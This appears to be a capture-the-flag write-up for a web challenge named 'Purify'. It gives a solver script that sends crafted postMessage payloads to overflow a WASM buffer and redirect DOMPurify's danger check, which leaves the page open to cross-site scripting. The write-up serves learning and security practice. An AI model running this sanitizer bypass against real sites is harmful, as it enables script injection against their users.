Tags: web
Rating:
Purify (web)
solver:
```html
<script>
const i = open("http://web/")
setTimeout(_=>{
i.postMessage("A".repeat(0x1000-2),"*")
i.postMessage("\x01\x00\x00\x00","*")
i.postMessage("","*")
i.postMessage("","*")
i.postMessage("","*")
//setTimeout(() => {
// console.log(new Uint8Array(wasm.memory.buffer).toString())
//}, 1000);
},1500)
</script>
```
Roughly, the flow involves conducting a buffer overflow to modify the pointer from "is_dangerous" to point to the "escape_attr" function. With this, DomPurify will only sanitize " and ' characters, allowing us to freely use < and > for performing XSS (Cross-Site Scripting).
